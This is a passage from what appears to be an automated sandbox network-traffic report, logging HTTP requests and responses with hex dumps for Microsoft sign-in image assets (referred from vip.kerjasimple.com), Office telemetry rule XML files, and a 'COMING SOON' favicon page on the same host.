                                                        2024-11-12 15:27:05 UTC1369INData Raw: 07 49 8f 44 00 14 6e 44 e3 31 8d a2 ac f5 87 86 6e cc a7 00 af 4a ce 9e b8 f6 da 33 67 56 ca 06 6d 1d 10 9f dd 40 60 c8 39 dd a6 74 9b 72 8e 0c b0 71 27 df 3f 79 c7 9d 17 ce c7 dd 21 0f 72 50 ff 3d c9 11 e8 39 c6 38 65 ec 64 a3 3f 6a 51 c6 19 05 a0 f9 f8 0e cc 27 e3 9c 02 3d 4f 39 a3 40 e9 61 a3 3f 6c 53 ce 18 8b 39 ea 3d bc fa 0c f6 e0 69 32 22 d7 13 12 90 c8 50 16 4c 2e aa 04 c3 5d 80 9e 61 ac 67 67 d2 70 96 0e ea b1 6d 10 d2 d4 57 5e 0a 39 81 77 d8 fa 70 d0 ef 0f 0e 95 65 d4 8f 6a 00 ad 1c 5b 7d e7 ad d0 6c 4e 83 4a f3 ec 5f b3 ad c3 7e bf df 3f d4 7b e5 6a e5 d8 fa 3b 6e 85 66 63 6a be 54 04 4f 83 d8 dc d9 39 38 dc d9 d9 14 00 ea 47 b4 6d 6b ad 3f 79 ee ce ad 8d f5 a1 b4 6d cb a2 c7 47 bf 3f cf c3 83 42 b7 8f 37 36 72 69 db 46 53 42 14 f1 ae fe 0a fc
                                                        Data Ascii: IDnD1nJ3gVm@`9trq'?y!rP=98ed?jQ'=O9@a?lS9=i2"PL.]aggpmW^9wpej[}lNJ_~?{j;nfcjTO98Gmk?ymG?B76riFSB


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        46192.168.2.64976813.107.246.454436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:05 UTC660OUTGET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1
                                                        Host: aadcdn.msauth.net
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://vip.kerjasimple.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-12 15:27:05 UTC805INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:05 GMT
                                                        Content-Type: image/svg+xml
                                                        Content-Length: 199
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Content-Encoding: gzip
                                                        Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                        ETag: 0x8DB5C3F49C21D98
                                                        x-ms-request-id: c97bf5e1-801e-0038-538a-2c6796000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20241112T152705Z-16547b76f7fm7xw6hC1DFW5px40000000fng00000000m6u6
                                                        x-fd-int-roxy-purgeid: 4554691
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:05 UTC199INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00
                                                        Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        47192.168.2.64977313.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:05 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:05 UTC491INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:05 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 419
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                        ETag: "0x8DC582BB32BB5CB"
                                                        x-ms-request-id: d33f60ae-f01e-0085-74ec-2b88ea000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152705Z-16547b76f7fr4g8xhC1DFW9cqc0000000f1g000000007szw
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:05 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        48192.168.2.64977213.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:05 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:05 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:05 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 471
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                        ETag: "0x8DC582BB5815C4C"
                                                        x-ms-request-id: 47d81796-701e-0021-2403-2d3d45000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152705Z-16547b76f7f2g4rlhC1DFWnx880000000fqg00000000eaq4
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:05 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        49192.168.2.64976313.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:05 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:05 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:05 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 428
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                        ETag: "0x8DC582BAC4F34CA"
                                                        x-ms-request-id: ec03aeec-b01e-005c-7ba1-344c66000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152705Z-17df447cdb5rnd49hC1DFWgmpw00000006fg000000007rx1
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:05 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        50192.168.2.64976413.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:05 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:05 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:05 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 499
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                        ETag: "0x8DC582B98CEC9F6"
                                                        x-ms-request-id: 8e718dad-301e-0051-6df1-2c38bb000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152705Z-16547b76f7fxsvjdhC1DFWprrs0000000fpg00000000gy0m
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:05 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        51192.168.2.64976513.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:05 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:05 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:05 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 415
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                        ETag: "0x8DC582B988EBD12"
                                                        x-ms-request-id: 231ce337-901e-0083-5701-2dbb55000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152705Z-16547b76f7fq9mcrhC1DFWq15w0000000fu000000000a8t2
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:05 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        52192.168.2.649767152.199.21.1754436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:05 UTC663OUTGET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1
                                                        Host: aadcdn.msftauth.net
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://vip.kerjasimple.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-12 15:27:05 UTC738INHTTP/1.1 200 OK
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Age: 20080397
                                                        Cache-Control: public, max-age=31536000
                                                        Content-MD5: 1jQlecEJaGhFO2st5KXLhg==
                                                        Content-Type: image/svg+xml
                                                        Date: Tue, 12 Nov 2024 15:27:05 GMT
                                                        Etag: 0x8DB5C3F4AC59B47
                                                        Last-Modified: Wed, 24 May 2023 10:11:51 GMT
                                                        Server: ECAcc (lhc/78BB)
                                                        Vary: Accept-Encoding
                                                        X-Cache: HIT
                                                        x-ms-blob-type: BlockBlob
                                                        x-ms-lease-status: unlocked
                                                        x-ms-request-id: 2ee1dbb1-b01e-00dc-3276-7e9a59000000
                                                        x-ms-version: 2009-09-19
                                                        Content-Length: 1636
                                                        Connection: close
                                                        2024-11-12 15:27:05 UTC1636INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61
                                                        Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        53192.168.2.649774159.89.194.494436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:05 UTC354OUTGET /favicon.ico HTTP/1.1
                                                        Host: vip.kerjasimple.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-12 15:27:06 UTC413INHTTP/1.1 200 OK
                                                        etag: "1089-0-146b90;br"
                                                        last-modified: Thu, 01 Jan 1970 00:00:00 GMT
                                                        content-type: text/html
                                                        content-length: 4233
                                                        accept-ranges: bytes
                                                        date: Tue, 12 Nov 2024 15:27:06 GMT
                                                        server: LiteSpeed
                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                        connection: close
                                                        2024-11-12 15:27:06 UTC4233INData Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 4f 4d 49 4e 47 20 53 4f 4f 4e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 67 69 6d 67 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 69 64 64 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 43 4f 4d 49 4e 47 20 53 4f 4f 4e 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 68 72 3e 0a 20 20 20 20 20 20 20 20 3c 70 20 69 64 3d 22 64 65 6d 6f 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 33 30 70 78 22 3e 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 62 6f 64 79 2c 0a 20 20 20 20 20 20 68 74 6d
                                                        Data Ascii: <html> <head> <title>COMING SOON</title> <body> <div class="bgimg"> <div class="middle"> <h1>COMING SOON</h1> <hr> <p id="demo" style="font-size:30px"></p> </div> </div> <style> body, htm


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        54192.168.2.64977613.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:06 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:06 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:06 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 494
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                        ETag: "0x8DC582BB8972972"
                                                        x-ms-request-id: 8d97175c-301e-005d-0fa7-34e448000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152706Z-15869dbbcc6x4rp4hC1DFW5xa8000000014000000000e45q
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:06 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        55192.168.2.64977713.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:06 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:06 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:06 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 420
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                        ETag: "0x8DC582B9DAE3EC0"
                                                        x-ms-request-id: 7cdefebb-b01e-0070-2ca7-341cc0000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152706Z-17df447cdb54qlp6hC1DFW67e800000001yg000000007m9w
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:06 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
